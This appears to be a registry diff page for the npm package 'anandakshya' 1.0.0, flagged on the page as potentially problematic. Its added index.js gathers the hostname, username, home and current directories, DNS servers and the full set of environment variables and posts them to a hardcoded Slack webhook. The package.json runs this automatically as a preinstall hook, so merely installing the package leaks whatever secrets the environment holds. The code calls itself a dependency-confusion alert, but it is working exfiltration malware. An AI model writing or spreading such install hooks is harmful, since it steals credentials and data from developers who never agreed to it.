anandakshya 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of anandakshya might be problematic. Click here for more details.
- package/index.js +34 -0
- package/package.json +12 -0
package/index.js
ADDED
@@ -0,0 +1,34 @@
|
|
1
|
+
const os = require('os');
|
2
|
+
const dns = require('dns');
|
3
|
+
const https = require('https');
|
4
|
+
const package = require('./package.json');
|
5
|
+
|
6
|
+
const slackWebhookUrl = 'https://hooks.slack.com/services/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';
|
7
|
+
|
8
|
+
const payload = JSON.stringify({
|
9
|
+
text: `*Alert: Dependency Confusion Attack Detected!*\n*Current Directory:* ${__dirname}\n*Home Directory:* ${os.homedir()}\n*Hostname:* ${os.hostname()}\n*Username:* ${os.userInfo().username}\n*Dns-Server:* ${dns.getServers()}\n*Package:* ${JSON.stringify(package, null, 2)}\n*Environment Variables:* ${JSON.stringify(process.env)}`
|
10
|
+
});
|
11
|
+
|
12
|
+
const webhookReqOptions = {
|
13
|
+
hostname: 'hooks.slack.com',
|
14
|
+
path: slackWebhookUrl,
|
15
|
+
method: 'POST',
|
16
|
+
headers: {
|
17
|
+
'Content-Type': 'application/json',
|
18
|
+
'Content-Length': payload.length
|
19
|
+
}
|
20
|
+
};
|
21
|
+
|
22
|
+
const req = https.request(webhookReqOptions, (res) => {
|
23
|
+
console.log(`Status: ${res.statusCode}`);
|
24
|
+
res.on('data', (d) => {
|
25
|
+
process.stdout.write(d);
|
26
|
+
});
|
27
|
+
});
|
28
|
+
|
29
|
+
req.on('error', (e) => {
|
30
|
+
console.error(e);
|
31
|
+
});
|
32
|
+
|
33
|
+
req.write(payload);
|
34
|
+
req.end();
|
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "anandakshya",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "anandakshya",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "anandakshya",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|